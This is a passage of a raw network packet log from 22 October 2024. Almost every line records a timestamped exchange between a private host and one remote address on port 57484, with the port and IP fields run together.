                                                                                                Oct 22, 2024 06:17:30.003005981 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.003040075 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.003060102 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.003084898 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.003727913 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.003778934 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.117326021 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.117418051 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.117449045 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.117826939 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.117862940 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.117876053 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.117876053 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.118493080 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.118521929 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.118705034 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.120038986 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.120326042 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.122589111 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.321983099 CEST8049748178.237.33.50192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.322704077 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:17:30.408207893 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.408299923 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.408329964 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.408386946 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.408693075 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.408731937 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.409066916 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.409427881 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.409460068 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.409481049 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.409492970 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.409563065 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.409941912 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.409976959 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.410150051 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.410681963 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.410713911 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.410744905 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.410754919 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.411164045 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.411211014 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.411565065 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.411593914 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.414845943 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.527024031 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.527067900 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.527107954 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.527173042 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.527651072 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.527704000 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.527769089 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.528140068 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.528188944 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.528527021 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.528564930 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.529185057 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.529217958 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.529263020 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.529263020 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.529993057 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.530029058 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.530062914 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.530113935 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.530566931 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.530601978 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.530642986 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.531265020 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.534759998 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.645648003 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.645791054 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.645828009 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.645895958 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.646399021 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.646452904 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.646517992 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.646943092 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.646981001 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.647048950 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.647800922 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.647836924 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.647890091 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.648519039 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.648555040 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.648588896 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.648626089 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.648643017 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.649225950 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.705096960 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.817651033 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.817775011 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.817806959 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.817862034 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.818109989 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.818192005 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.818239927 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.818875074 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.819188118 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.819221973 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.819262981 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.819262981 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.819727898 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.819762945 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.820254087 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.820552111 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.820590019 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.820622921 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.820667028 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.821399927 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.821434975 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.821468115 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.821512938 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.821512938 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.822153091 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.908433914 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.936352968 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.936398983 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.936455965 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.936959028 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.936997890 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937050104 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937747955 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937901020 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937939882 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937956095 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.937956095 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.938237906 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.938508034 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.938539982 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.938576937 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.938615084 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.939374924 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.939409971 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.939503908 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.939944029 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.939976931 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.940723896 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.940761089 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.940799952 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.942704916 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.055241108 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.055339098 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.055366039 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.055406094 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.056173086 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.056238890 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.056411982 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.056451082 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.056499004 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.057205915 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.057245970 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.057282925 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.057324886 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.057326078 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.058013916 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.058051109 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.058856010 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.058891058 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.058934927 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.058934927 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.059679031 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.059716940 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.059746981 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.059896946 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.060461044 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.060497046 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.060539007 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.173798084 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.173854113 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.174026012 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.174063921 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.174257040 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.174666882 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175065041 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175098896 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175158978 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.175700903 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175736904 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175751925 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.176541090 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.176577091 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.176637888 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.177385092 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.177419901 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.177450895 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.177463055 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.177505970 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.178214073 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.178251028 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.178293943 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.179043055 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.179079056 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.179111004 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.179122925 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.179147005 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.179526091 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.292578936 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.292670965 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.292709112 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.292823076 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.293590069 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.293644905 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.293705940 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.293925047 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.293962002 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.293973923 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.294745922 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.294783115 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.294842958 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.296705961 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296744108 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296761990 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.296776056 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296811104 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296845913 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.296863079 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.296888113 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.297017097 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.297051907 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.297832012 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.297868967 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.297890902 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.297911882 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.411190987 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411282063 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411336899 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.411340952 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411889076 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411937952 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.411938906 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.412700891 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.412759066 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.412794113 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.413196087 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.413232088 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.413240910 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.413268089 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.413312912 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.414026976 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.414062977 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.414103985 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.414865017 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.414900064 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.414932013 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.414946079 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.415679932 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.415716887 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.415734053 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.416520119 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.416554928 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.416565895 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.417293072 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.417342901 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.530021906 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.530075073 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.530112982 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.530117989 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.530658007 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.530704975 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.531064987 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.531102896 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.531145096 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.531708956 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.531744957 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.531790972 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.532533884 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.532572031 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.532604933 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.532623053 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.533364058 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.533399105 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.533413887 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.534192085 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.534226894 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.534235954 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.535038948 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.535075903 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.535092115 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.535857916 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.535893917 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.535907984 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.535928965 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.535974026 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.648607016 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.648700953 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.648741961 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.648741961 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.649354935 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.649405956 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.649759054 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.649795055 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.649837017 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.650407076 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.650441885 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.650485039 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.651292086 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.651356936 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.651401997 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.652138948 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.652174950 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.652220011 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.652887106 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.652924061 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.652956963 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.652965069 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.653734922 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.653770924 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.653779984 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.654699087 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.654736996 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.654752970 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.655388117 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.655422926 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.655456066 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.767482996 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.767534971 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.767554998 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.768033981 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.768080950 CEST4974757484192.168.2.443.226.229.232
